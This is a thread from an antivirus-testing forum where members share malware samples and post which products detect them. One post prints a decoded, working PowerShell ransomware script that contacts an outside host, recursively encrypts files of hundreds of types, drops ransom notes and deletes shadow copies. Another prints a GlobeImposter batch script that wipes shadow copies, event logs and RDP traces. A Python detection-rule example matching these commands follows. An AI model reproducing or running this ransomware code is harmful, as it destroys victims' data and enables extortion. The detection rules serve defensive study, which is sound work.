18.07.2017, 06:32
(This post was last modified: 18.07.2017, 09:21 by slav.)
Immunet doesn't see it. Zemana AL detects it only on a detailed scan, as Trojan:Generic/Kasatura.A!Ecke
Hitman detects it
Eset SS detects it
Immunet - PC Tools Firewall Plus
Webroot detects it on execution
18.07.2017, 19:30
(This post was last modified: 18.07.2017, 19:46 by tachion.)
Phishing: PayPal
Win32_Ursnif
Behaviour similar to Zbot: it steals confidential information from the infected computer, sniffs network traffic and steals certificates.
(18.07.2017, 19:30) tachion wrote: Win32_Ursnif
Behaviour similar to Zbot: it steals confidential information from the infected computer, sniffs network traffic and steals certificates.
Avast does not detect it - sent to the lab
Avira detects it
Comodo does not detect it - sent to the lab
22.07.2017, 05:16
(This post was last modified: 27.07.2017, 12:54 by slav.)
Eset SS detects Win32_Ursnif
Kaspersky Free too
Immunet - PC Tools Firewall Plus
Ransomware_PowerWare_Nemucod - uses PowerShell
decoded script:
Code:
$khghcshjxnjHJJ = "HKCU:\Software\ENCR000\Scripts"
$KnnOOOjsjjfRFghcs = "Version"
if((Test-Path $khghcshjxnjHJJ) -eq $true)
{exit}
else
{
New-Item -Path $khghcshjxnjHJJ -Force | Out-Null
New-ItemProperty -Path $khghcshjxnjHJJ -Name $KnnOOOjsjjfRFghcs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
$000073648732648732 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$00462458234832 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
$926225742886527 = "http://m1-systems.xyz/pi.php"
$910827030402006 = "string=$000073648732648732&string2=$467346782779685&uuid=$00462458234832"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
Start-Sleep -Seconds 97
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($000073648732648732)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $000073648732648732, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj
","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
try{
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
$hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
}
else
{
$hxTgashdnUjuwjdcTgshdnRfgshd = 4096
}
$34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
$YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
$GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
$GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
$GshshdTgshxJuahxthH.Close()
$YhchcRgsghxYhshdcThgh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
$IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
$OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
$OlskcTshcUjsmcTgshdjJJ.Close()
$bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
$OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"));
if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $00462458234832</p></font></h1>")
}}
catch
{
}
}}
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit
Ransomware_Globeimposter
Code:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
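Detection logic for the behaviours the two scripts above share (shadow-copy removal, event-log clearing, RDP-trace cleanup, and the PowerShell key derivation plus recursive file enumeration), written as an added example that is not part of the original thread. The process-creation records and host names are constructed, and the rule names and the two-rule threshold are my own choices.

```python
import re

# Detection rules for behaviours seen in the PowerWare/Nemucod PowerShell and the
# GlobeImposter batch script: shadow-copy removal, event-log clearing, RDP-trace
# cleanup, and in-script key derivation plus recursive file enumeration.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|win32_shadowcopy[\s\S]*\.delete\(\)", re.I),
    "event_log_clearing": re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
    "rdp_trace_cleanup": re.compile(
        r"reg\s+delete\s+\"?hkey_current_user\\software\\microsoft\\terminal server client"
        r"|\bdel\s+default\.rdp", re.I),
    "inline_file_encryption": re.compile(
        r"(?=[\s\S]*rijndaelmanaged)(?=[\s\S]*rfc2898derivebytes)(?=[\s\S]*-recurse)", re.I),
}

def match_event(command_line):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def triage(events, threshold=2):
    """Aggregate rule hits per host over (host, command_line) events.

    A host is flagged only when it trips `threshold` or more distinct rules: a lone
    vssadmin or reg call is routine admin work, while the combination is the
    pattern both scripts above exhibit."""
    hits = {}
    for host, cmd in events:
        hits.setdefault(host, set()).update(match_event(cmd))
    return {host: {"rules": sorted(r), "flag": len(r) >= threshold}
            for host, r in hits.items()}

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "vssadmin.exe Delete Shadows /All /Quiet"),
    ("ws01", 'reg delete "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers" /f'),
    ("ws01", 'wevtutil.exe cl "Security"'),
    ("ws01", 'powershell.exe -c "$s=Get-WmiObject Win32_ShadowCopy; foreach($c in $s){$c.Delete()}"'),
    ("ws02", "vssadmin.exe Delete Shadows /For=C: /Oldest"),   # one-off admin cleanup
    ("ws02", "reg query HKCU\\Software\\Microsoft\\Terminal Server Client"),
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, "FLAGGED" if verdict["flag"] else "ok", verdict["rules"])
```

Feed it real process-creation telemetry (e.g. Sysmon event 1 command lines) per host; ws02 shows why a single shadow-copy deletion alone should not page anyone.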
ESET NOD32 Antivirus
Zemana AntiMalware (Premium)
Immunet - PC Tools Firewall Plus
Polish Ransomware_ClicoCrypter
AppCheck Anti-Ransomware blocks it on execution
(16.08.2017, 20:38) tachion wrote: Polish Ransomware_ClicoCrypter
Kaspersky free - 1/1
Comodo 0/1 - sent to the lab.
(16.08.2017, 20:38) tachion wrote: Polish Ransomware_ClicoCrypter
Arcabit Internet Security 1/1
(16.08.2017, 20:38) tachion wrote: Polish Ransomware_ClicoCrypter
NOD32 detects it
ESET NOD32 Antivirus
Zemana AntiMalware (Premium)
Trojan Downloader_Hancitor_Pony
(17.08.2017, 21:09) tachion wrote: Trojan Downloader_Hancitor_Pony
Kaspersky free 1/1
Comodo 0/1 - sent to the lab
This ransomware with the TV licence fee must be a government one, I guess
1. I am always right.
2. If I am not right, see point 1.
What can I say.. hello after a very long break. You surely missed me and the packages.. but let's get to the point. Besides the pack I am also adding an analysis of the antivirus engines in a txt file.
[Malware Pack] Aug 2017 #23:
Windows Defender 20/23 86,95%